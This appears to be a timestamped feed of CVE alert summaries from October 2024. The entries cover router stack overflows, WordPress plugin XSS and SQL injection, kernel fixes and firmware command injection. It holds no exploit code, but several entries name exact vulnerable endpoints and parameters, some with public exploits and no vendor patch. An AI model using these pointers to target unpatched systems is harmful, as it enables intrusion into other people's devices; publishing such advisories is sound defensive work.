🚨 CVE-2023-47456Tenda AX1806 V1.0.0.1 contains a stack overflow vulnerability in function sub_455D4, called by function fromSetWirelessRepeat.🎖@cveNotify |
|
| 2024-10-28 19:37:31 |
🚨 CVE-2023-46992TOTOLINK A3300R V17.0.0cu.557_B20221024 is vulnerable to Incorrect Access Control. Attackers are able to reset serveral critical passwords without authentication by visiting specific pages.🎖@cveNotify |
|
| 2024-10-28 19:37:30 |
🚨 CVE-2023-30909A remote authentication bypass issue exists in someOneView APIs.🎖@cveNotify |
|
| 2024-10-28 19:37:26 |
🚨 CVE-2023-3253An improper authorization vulnerability exists where an authenticated, low privileged remote attacker could view a list of all the users available in the application.🎖@cveNotify |
|
| 2024-10-28 19:37:25 |
🚨 CVE-2022-3437A heap-based buffer overflow vulnerability was found in Samba within the GSSAPI unwrap_des() and unwrap_des3() routines of Heimdal. The DES and Triple-DES decryption routines in the Heimdal GSSAPI library allow a length-limited write buffer overflow on malloc() allocated memory when presented with a maliciously small packet. This flaw allows a remote user to send specially crafted malicious data to the application, possibly resulting in a denial of service (DoS) attack.🎖@cveNotify |
|
| 2024-10-28 18:37:32 |
🚨 CVE-2024-50440Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Chris Coyier CodePen Embedded Pens Shortcode allows Stored XSS.This issue affects CodePen Embedded Pens Shortcode: from n/a through 1.0.2.🎖@cveNotify |
|
| 2024-10-28 18:37:26 |
🚨 CVE-2024-50439Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brainstorm Force Astra Widgets allows Stored XSS.This issue affects Astra Widgets: from n/a through 1.2.14.🎖@cveNotify |
|
| 2024-10-28 18:37:25 |
🚨 CVE-2024-5640The Prime Slider – Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ attribute within the Pacific widget in all versions up to, and including, 3.14.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-28 18:37:24 |
🚨 CVE-2023-31462An issue was discovered in SteelSeries GG 36.0.0. An attacker can change values in an unencrypted database that is writable for all users on the computer, in order to trigger code execution with higher privileges.🎖@cveNotify |
|
| 2024-10-28 18:07:32 |
🚨 CVE-2024-47019In ProtocolEmbmsSaiListAdapter::Init() of protocolembmsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User Interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-28 18:07:25 |
🚨 CVE-2023-34315Incorrect default permissions in some Intel(R) VROC software before version 8.0.8.1001 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-28 18:07:24 |
🚨 CVE-2023-31271Improper access control in some Intel(R) VROC software before version 8.0.8.1001 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-28 17:37:25 |
🚨 CVE-2023-48022Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment🎖@cveNotify |
|
| 2024-10-28 17:07:45 |
🚨 CVE-2024-49988In the Linux kernel, the following vulnerability has been resolved:ksmbd: add refcnt to ksmbd_conn structWhen sending an oplock break request, opinfo->conn is used,But freed ->conn can be used on multichannel.This patch add a reference count to the ksmbd_conn structso that it can be freed when it is no longer used.🎖@cveNotify |
|
| 2024-10-28 16:37:43 |
🚨 CVE-2024-42028A Local privilege escalation vulnerability found in a Self-Hosted UniFi Network Server with UniFi Network Application (Version 8.4.62 and earlier) allows a malicious actor with a local operational system user to execute high privilege actions on UniFi Network Server.🎖@cveNotify |
|
| 2024-10-28 16:37:36 |
🚨 CVE-2024-48191dingfanzu CMS 1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/doAdminAction.php?act=delAdmin&id=17🎖@cveNotify |
|
| 2024-10-28 16:37:35 |
🚨 CVE-2024-49985In the Linux kernel, the following vulnerability has been resolved:i2c: stm32f7: Do not prepare/unprepare clock during runtime suspend/resumeIn case there is any sort of clock controller attached to this I2C buscontroller, for example Versaclock or even an AIC32x4 I2C codec, thenan I2C transfer triggered from the clock controller clk_ops .preparecallback may trigger a deadlock on drivers/clk/clk.c prepare_lock mutex.This is because the clock controller first grabs the prepare_lock mutexand then performs the prepare operation, including its I2C access. TheI2C access resumes this I2C bus controller via .runtime_resume callback,which calls clk_prepare_enable(), which attempts to grab the prepare_lockmutex again and deadlocks.Since the clock are already prepared since probe() and unprepared inremove(), use simple clk_enable()/clk_disable() calls to enable anddisable the clock on runtime suspend and resume, to avoid hitting theprepare_lock mutex.🎖@cveNotify |
|
| 2024-10-28 16:37:31 |
🚨 CVE-2024-49957In the Linux kernel, the following vulnerability has been resolved:ocfs2: fix null-ptr-deref when journal load failed.During the mounting process, if journal_reset() fails because of too shortjournal, then lead to jbd2_journal_load() fails with NULL j_sb_buffer. Subsequently, ocfs2_journal_shutdown() callsjbd2_journal_flush()->jbd2_cleanup_journal_tail()->__jbd2_update_log_tail()->jbd2_journal_update_sb_log_tail()->lock_buffer(journal->j_sb_buffer), resulting in a null-pointerdereference error.To resolve this issue, we should check the JBD2_LOADED flag to ensure thejournal was properly loaded. Additionally, use journal instead ofosb->journal directly to simplify the code.🎖@cveNotify |
|
| 2024-10-28 16:37:30 |
🚨 CVE-2023-49231An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated attacker to receive an administrative API token.🎖@cveNotify |
|
| 2024-10-28 16:37:26 |
🚨 CVE-2024-30630Tenda FH1205 v2.0.0.7(775) has a stack overflow vulnerability in the time parameter from saveParentControlInfo function.🎖@cveNotify |
|
| 2024-10-28 16:37:25 |
🚨 CVE-2024-30596Tenda FH1202 v1.2.0.14(408) has a stack overflow vulnerability in the deviceId parameter of the formSetDeviceName function.🎖@cveNotify |
|
| 2024-10-28 16:37:24 |
🚨 CVE-2023-40290An issue was discovered on Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66 devices. An attacker could exploit an XSS issue that affects Internet Explorer 11 on Windows.🎖@cveNotify |
|
| 2024-10-28 16:08:20 |
🚨 CVE-2024-10335A vulnerability was found in SourceCodester Garbage Collection Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "username" to be affected. But it must be assumed that the parameter "password" is affected as well.🎖@cveNotify |
|
| 2024-10-28 16:08:19 |
🚨 CVE-2024-10123A vulnerability was found in Tenda AC8 16.03.34.06. It has been declared as critical. Affected by this vulnerability is the function compare_parentcontrol_time of the file /goform/saveParentControlInfo. The manipulation of the argument time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This is not the same issue like CVE-2023-33671. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-28 15:38:07 |
🚨 CVE-2024-46998baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in the Edit Email Form Settings Feature. Version 5.1.2 fixes the issue.🎖@cveNotify |
|
| 2024-10-28 15:38:03 |
🚨 CVE-2024-46994baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in Blog posts and Contents list Feature. Version 5.1.2 fixes this issue.🎖@cveNotify |
|
| 2024-10-28 15:38:02 |
🚨 CVE-2023-34034Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.🎖@cveNotify |
|
| 2024-10-28 14:38:01 |
🚨 CVE-2024-22949JFreeChart v1.5.4 was discovered to contain a NullPointerException via the component /chart/annotations/CategoryLineAnnotation. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-10-28 14:37:54 |
🚨 CVE-2024-31815In TOTOLINK EX200 V4.0.3c.7314_B20191204, an attacker can obtain the configuration file without authorization through /cgi-bin/ExportSettings.sh🎖@cveNotify |
|
| 2024-10-28 14:37:53 |
🚨 CVE-2024-31002Buffer Overflow vulnerability in Bento4 Bento v.1.6.0-641 allows a remote attacker to execute arbitrary code via the AP4 BitReader::ReadCache() at Ap4Utils.cpp component.🎖@cveNotify |
|
| 2024-10-28 14:08:23 |
🚨 CVE-2024-49378smartUp, a web browser mouse gestures extension, has a universal cross-site scripting issue in the Edge and Firefox versions of smartUp 7.2.622.1170. The vulnerability allows another extension to execute arbitrary code in the context of the user’s tab. As of time of publication, no known patches exist.🎖@cveNotify |
|
| 2024-10-28 14:08:16 |
🚨 CVE-2024-10380A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/ajax_product.php. The manipulation of the argument drop_services leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-28 14:08:15 |
🚨 CVE-2024-47021In sms_ExtractCbLanguage of sms_CellBroadcast.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-28 14:08:11 |
🚨 CVE-2024-44101there is a possible Null Pointer Dereference (modem crash) due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-28 14:08:10 |
🚨 CVE-2024-44100Android before 2024-10-05 on Google Pixel devices allows information disclosure in the modem component, A-299774545.🎖@cveNotify |
|
| 2024-10-28 14:08:09 |
🚨 CVE-2024-44099There is a possible Local bypass of user interaction due to an insecure default value. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-28 13:37:42 |
🚨 CVE-2024-50463URL Redirection to Untrusted Site ('Open Redirect') vulnerability in WP Sunshine Sunshine Photo Cart.This issue affects Sunshine Photo Cart: from n/a through 3.2.9.🎖@cveNotify |
|
| 2024-10-28 13:37:36 |
🚨 CVE-2024-10447A vulnerability classified as critical was found in Project Worlds Online Time Table Generator 1.0. Affected by this vulnerability is an unknown functionality of the file /timetable/staff/staffdashboard.php?info=updateprofile. The manipulation of the argument n leads to sql injection. The attack can be launched remotely.🎖@cveNotify |
|
| 2024-10-28 13:37:35 |
🚨 CVE-2024-47821pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue.🎖@cveNotify |
|
| 2024-10-28 13:37:34 |
🚨 CVE-2024-47023there is a possible man-in-the-middle attack due to a logic error in the code. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-28 12:37:39 |
🚨 CVE-2024-50498Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console: from n/a through 1.0.🎖@cveNotify |
|
| 2024-10-28 12:37:38 |
🚨 CVE-2024-50492Improper Control of Generation of Code ('Code Injection') vulnerability in Scott Paterson ScottCart allows Code Injection.This issue affects ScottCart: from n/a through 1.1.🎖@cveNotify |
|
| 2024-10-28 12:37:34 |
🚨 CVE-2024-50487Authentication Bypass Using an Alternate Path or Channel vulnerability in MaanTheme MaanStore API allows Authentication Bypass.This issue affects MaanStore API: from n/a through 1.0.1.🎖@cveNotify |
|
| 2024-10-28 12:37:33 |
🚨 CVE-2024-50450Improper Control of Generation of Code ('Code Injection') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Injection.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n/a through 1.3.3.4.🎖@cveNotify |
|
| 2024-10-28 12:37:29 |
🚨 CVE-2024-50442Improper Restriction of XML External Entity Reference vulnerability in WP Royal Royal Elementor Addons allows XML Injection.This issue affects Royal Elementor Addons: from n/a through 1.3.980.🎖@cveNotify |
|
| 2024-10-28 12:37:28 |
🚨 CVE-2024-48074An authorized RCE vulnerability exists in the DrayTek Vigor2960 router version 1.4.4, where an attacker can place a malicious command into the table parameter of the doPPPoE function in the cgi-bin/mainfunction.cgi route, and finally the command is executed by the system function.🎖@cveNotify |
|
| 2024-10-28 12:37:27 |
🚨 CVE-2024-10446A vulnerability classified as critical has been found in Project Worlds Online Time Table Generator 1.0. Affected is an unknown function of the file /timetable/admin/admindashboard.php?info=add_course. The manipulation of the argument c leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-28 12:07:35 |
🚨 CVE-2023-2869The WP-Members Membership plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the do_field_reorder function in versions up to, and including, 3.4.7.3. This makes it possible for authenticated attackers with subscriber-level access to reorder form elements on login forms.🎖@cveNotify |
|
| 2024-10-28 12:07:34 |
🚨 CVE-2017-2222Cross-site scripting vulnerability in WP-Members prior to version 3.1.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-10-28 12:07:33 |
🚨 CVE-2013-5919Suricata before 1.4.6 allows remote attackers to cause a denial of service (crash) via a malformed SSL record.🎖@cveNotify |
|
| 2024-10-28 07:37:26 |
🚨 CVE-2024-38821Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances.For this to impact an application, all of the following must be true: * It must be a WebFlux application * It must be using Spring's static resources support * It must have a non-permitAll authorization rule applied to the static resources support🎖@cveNotify |
|
| 2024-10-28 07:37:25 |
🚨 CVE-2023-5962A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization.🎖@cveNotify |
|
| 2024-10-28 07:37:24 |
🚨 CVE-2023-39982A vulnerability has been identified in MXsecurity versions prior to v1.0.1. The vulnerability may put the confidentiality and integrity of SSH communications at risk on the affected device. This vulnerability is attributed to a hard-coded SSH host key, which might facilitate man-in-the-middle attacks and enable the decryption of SSH traffic.🎖@cveNotify |
|
| 2024-10-28 06:37:32 |
🚨 CVE-2023-34215TN-5900 Series firmware versions v3.3 and prior are vulnerable to the command-injection vulnerability. This vulnerability stems from insufficient input validation and improper authentication in the certification-generation function, which could potentially allow malicious users to execute remote code on affected devices.🎖@cveNotify |
|
| 2024-10-28 06:37:25 |
🚨 CVE-2023-33238TN-4900 Series firmware versions v1.2.4 and prior and TN-5900 Series firmware versions v3.3 and prior are vulnerable to the command injection vulnerability. This vulnerability stems from inadequate input validation in the certificate management function, which could potentially allow malicious users to execute remote code on affected devices.🎖@cveNotify |
|
| 2024-10-28 06:37:24 |
🚨 CVE-2023-33237TN-5900 Series firmware version v3.3 and prior is vulnerable to improper-authentication vulnerability. This vulnerability arises from inadequate authentication measures implemented in the web API handler, allowing low-privileged APIs to execute restricted actions that only high-privileged APIs are allowed This presents a potential risk of unauthorized exploitation by malicious actors.🎖@cveNotify |
|
| 2024-10-28 05:37:24 |
🚨 CVE-2024-50307Use of potentially dangerous function issue exists in Chatwork Desktop Application (Windows) versions prior to 2.9.2. If a user clicks a specially crafted link in the application, an arbitrary file may be downloaded from an external website and executed. As a result, arbitrary code may be executed on the device that runs Chatwork Desktop Application (Windows).🎖@cveNotify |
|
| 2024-10-28 04:37:24 |
🚨 CVE-2024-48936SchedMD Slurm before 24.05.4 has Incorrect Authorization. A mistake in authentication handling in stepmgr could permit an attacker to execute processes under other users' jobs. This is limited to jobs explicitly running with --stepmgr, or on systems that have globally enabled stepmgr via SlurmctldParameters=enable_stepmgr in their configuration.🎖@cveNotify |
|
| 2024-10-28 03:37:25 |
🚨 CVE-2024-10439The eHRD CTMS from Sunnet has an Insecure Direct Object Reference (IDOR) vulnerability, allowing unauthenticated remote attackers to modify a specific parameter to access arbitrary files uploaded by any user.🎖@cveNotify |
|
| 2024-10-28 03:37:24 |
🚨 CVE-2024-10438The eHRD CTMS from Sunnet has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to bypass authentication by satisfying specific conditions in order to access certain functionalities.🎖@cveNotify |
|
| 2024-10-28 02:37:38 |
🚨 CVE-2023-46359An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.🎖@cveNotify |
|
| 2024-10-28 02:37:32 |
🚨 CVE-2023-20833In keyinstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08017756; Issue ID: ALPS08017764.🎖@cveNotify |
|
| 2024-10-28 02:37:31 |
🚨 CVE-2023-20812In wlan driver, there is a possible out of bounds write due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07944987; Issue ID: ALPS07944987.🎖@cveNotify |
|
| 2024-10-14 06:37:26 |
🚨 CVE-2024-0794Certain HP LaserJet Pro, HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to Remote Code Execution due to buffer overflow when rendering fonts embedded in a PDF file.🎖@cveNotify |
|
| 2024-10-14 06:37:25 |
🚨 CVE-2023-48387TAIWAN-CA(TWCA) JCICSecurityTool fails to check the source website and access locations when executing multiple Registry-related functions. In the scenario where a user is using the JCICSecurityTool and has completed identity verification, if the user browses a malicious webpage created by an attacker, the attacker can exploit this vulnerability to read or modify any registry file under HKEY_CURRENT_USER, thereby achieving remote code execution.🎖@cveNotify |
|
| 2024-10-14 04:37:32 |
🚨 CVE-2023-38027SpotCam Co., Ltd. SpotCam Sense’s hidden Telnet function has a vulnerability of OS command injection. An remote unauthenticated attacker can exploit this vulnerability to execute command injection attack to perform arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2024-10-14 04:37:26 |
🚨 CVE-2023-37291Galaxy Software Services Vitals ESP is vulnerable to using a hard-coded encryption key. An unauthenticated remote attacker can generate a valid token parameter and exploit this vulnerability to access system to operate processes and access data.This issue affects Vitals ESP: from 3.0.8 through 6.2.0.🎖@cveNotify |
|
| 2024-10-14 04:37:25 |
🚨 CVE-2023-28704Furbo dog camera has insufficient filtering for special parameter of device log management function. An unauthenticated remote attacker in the Bluetooth network with normal user privileges can exploit this vulnerability to perform command injection attack to execute arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2024-10-14 04:37:24 |
🚨 CVE-2023-28703ASUS RT-AC86U’s specific cgi function has a stack-based buffer overflow vulnerability due to insufficient validation for network packet header length. A remote attacker with administrator privileges can exploit this vulnerability to execute arbitrary system commands, disrupt system or terminate service.🎖@cveNotify |
|
| 2024-10-14 03:37:25 |
🚨 CVE-2024-9921The Team+ from TEAMPLUS TECHNOLOGY does not properly validate specific page parameter, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify and delete database contents.🎖@cveNotify |
|
| 2024-10-14 03:37:24 |
🚨 CVE-2024-45506HAProxy 2.9.x before 2.9.10, 3.0.x before 3.0.4, and 3.1.x through 3.1-dev6 allows a remote denial of service for HTTP/2 zero-copy forwarding (h2_send loop) under a certain set of conditions, as exploited in the wild in 2024.🎖@cveNotify |
|
| 2024-10-13 21:37:24 |
🚨 CVE-2024-7099netease-youdao/qanything version 1.4.1 contains a vulnerability where unsafe data obtained from user input is concatenated in SQL queries, leading to SQL injection. The affected functions include `get_knowledge_base_name`, `from_status_to_status`, `delete_files`, and `get_file_by_status`. An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially stealing information from the database. The issue is fixed in version 1.4.2.🎖@cveNotify |
|
| 2024-10-13 20:37:25 |
🚨 CVE-2024-9917A vulnerability, which was classified as critical, was found in HuangDou UTCMS V9. This affects an unknown part of the file app/modules/ut-template/admin/template_creat.php. The manipulation of the argument content leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-13 20:37:24 |
🚨 CVE-2024-8070CWE-312: Cleartext Storage of Sensitive Information vulnerability exists that exposes testcredentials in the firmware binary🎖@cveNotify |
|
| 2024-10-13 19:37:25 |
🚨 CVE-2024-9916A vulnerability, which was classified as critical, has been found in HuangDou UTCMS V9. Affected by this issue is some unknown functionality of the file app/modules/ut-cac/admin/cli.php. The manipulation of the argument o leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-13 19:37:24 |
🚨 CVE-2024-9915A vulnerability classified as critical was found in D-Link DIR-619L B1 2.06. Affected by this vulnerability is the function formVirtualServ of the file /goform/formVirtualServ. The manipulation of the argument curTime leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 18:37:25 |
🚨 CVE-2024-9914A vulnerability classified as critical has been found in D-Link DIR-619L B1 2.06. Affected is the function formSetWizardSelectMode of the file /goform/formSetWizardSelectMode. The manipulation of the argument curTime leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 18:37:24 |
🚨 CVE-2024-9913A vulnerability was found in D-Link DIR-619L B1 2.06. It has been rated as critical. This issue affects the function formSetRoute of the file /goform/formSetRoute. The manipulation of the argument curTime leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 17:37:24 |
🚨 CVE-2024-9912A vulnerability was found in D-Link DIR-619L B1 2.06. It has been declared as critical. This vulnerability affects the function formSetQoS of the file /goform/formSetQoS. The manipulation of the argument curTime leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 16:37:24 |
🚨 CVE-2024-9911A vulnerability was found in D-Link DIR-619L B1 2.06. It has been classified as critical. This affects the function formSetPortTr of the file /goform/formSetPortTr. The manipulation of the argument curTime leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 15:37:24 |
🚨 CVE-2024-9910A vulnerability was found in D-Link DIR-619L B1 2.06 and classified as critical. Affected by this issue is the function formSetPassword of the file /goform/formSetPassword. The manipulation of the argument curTime leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 14:37:24 |
🚨 CVE-2024-9909A vulnerability has been found in D-Link DIR-619L B1 2.06 and classified as critical. Affected by this vulnerability is the function formSetMuti of the file /goform/formSetMuti. The manipulation of the argument curTime leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 13:37:24 |
🚨 CVE-2024-6959A vulnerability in parisneo/lollms-webui version 9.8 allows for a Denial of Service (DOS) attack when uploading an audio file. If an attacker appends a large number of characters to the end of a multipart boundary, the system will continuously process each character, rendering lollms-webui inaccessible. This issue is exacerbated by the lack of Cross-Site Request Forgery (CSRF) protection, enabling remote exploitation. The vulnerability leads to service disruption, resource exhaustion, and extended downtime.🎖@cveNotify |
|
| 2024-10-13 12:37:24 |
🚨 CVE-2024-9908A vulnerability, which was classified as critical, was found in D-Link DIR-619L B1 2.06. Affected is the function formSetMACFilter of the file /goform/formSetMACFilter. The manipulation of the argument curTime leads to buffer overflow. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 05:37:24 |
🚨 CVE-2024-9907A vulnerability classified as problematic was found in QileCMS up to 1.1.3. This vulnerability affects the function sendEmail of the file /qilecms/user/controller/Forget.php of the component Verification Code Handler. The manipulation leads to weak password recovery. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-13 04:37:24 |
🚨 CVE-2024-9906A vulnerability, which was classified as problematic, was found in SourceCodester Online Eyewear Shop 1.0. Affected is an unknown function of the file /admin/?page=inventory/view_inventory&id=2. The manipulation of the argument Code leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 03:37:24 |
🚨 CVE-2024-9905A vulnerability, which was classified as critical, has been found in SourceCodester Online Eyewear Shop 1.0. This issue affects some unknown processing of the file /admin/?page=inventory/view_inventory&id=2. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-13 02:37:24 |
🚨 CVE-2024-9904A vulnerability classified as critical was found in 07FLYCMS, 07FLY-CMS and 07FlyCRM up to 1.2.0. This vulnerability affects the function pictureUpload of the file /admin/File/pictureUpload. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The affected product is known with different names like 07FLYCMS, 07FLY-CMS, and 07FlyCRM. It was not possible to reach out to the vendor before assigning a CVE due to a not working mail address.🎖@cveNotify |
|
| 2024-10-12 23:37:24 |
🚨 CVE-2024-9903A vulnerability classified as critical has been found in 07FLYCMS, 07FLY-CMS and 07FlyCRM up to 1.2.0. This affects the function fileUpload of the file /admin/File/fileUpload. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The affected product is known with different names like 07FLYCMS, 07FLY-CMS, and 07FlyCRM. It was not possible to reach out to the vendor before assigning a CVE due to a not working mail address.🎖@cveNotify |
|
| 2024-10-12 14:37:24 |
🚨 CVE-2024-49193Zendesk before 2024-07-02 allows remote attackers to read ticket history via e-mail spoofing, because Cc fields are extracted from incoming e-mail messages and used to grant additional authorization for ticket viewing, the mechanism for detecting spoofed e-mail messages is insufficient, and the support e-mail addresses associated with individual tickets are predictable.🎖@cveNotify |
|
| 2024-10-12 13:37:24 |
🚨 CVE-2024-9894A vulnerability, which was classified as critical, was found in code-projects Blood Bank System 1.0. Affected is an unknown function of the file reset.php. The manipulation of the argument useremail leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-12 10:37:25 |
🚨 CVE-2024-8902The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.8 via the render_column function in modules/data-table/widgets/data-table.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.🎖@cveNotify |
|
| 2024-10-12 10:37:24 |
🚨 CVE-2024-8757The WP Post Author – Boost Your Blog's Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the linked_user_id parameter in all versions up to, and including, 3.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-10-12 09:37:25 |
🚨 CVE-2024-8915The Category Icon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-12 09:37:24 |
🚨 CVE-2024-8760The Stackable – Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to CSS Injection in all versions up to, and including, 3.13.6. This makes it possible for unauthenticated attackers to embed untrusted style information into comments resulting in a possibility of data exfiltration such as admin nonces with limited impact. These nonces could be used to perform CSRF attacks within a limited time window. The presence of other plugins may make additional nonces available, which may pose a risk in plugins that don't perform capability checks to protect AJAX actions or other actions reachable by lower-privileged users.🎖@cveNotify |
|
| 2024-10-12 07:37:25 |
🚨 CVE-2024-9756The Order Attachments for WooCommerce plugin for WordPress is vulnerable to unauthorized limited arbitrary file uploads due to a missing capability check on the wcoa_add_attachment AJAX action in versions 2.0 to 2.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload limited file types.🎖@cveNotify |
|
| 2024-10-12 07:37:24 |
🚨 CVE-2024-9047The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.🎖@cveNotify |
|
| 2024-10-12 06:37:32 |
🚨 CVE-2024-9778The ImagePress – Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the 'imagepress_admin_page' function. This makes it possible for unauthenticated attackers to update plugin settings, including redirection URLs, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-12 06:37:25 |
🚨 CVE-2024-9187The Read more By Adam plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteRm() function in all versions up to, and including, 1.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete read more buttons.🎖@cveNotify |
|
| 2024-10-12 06:37:24 |
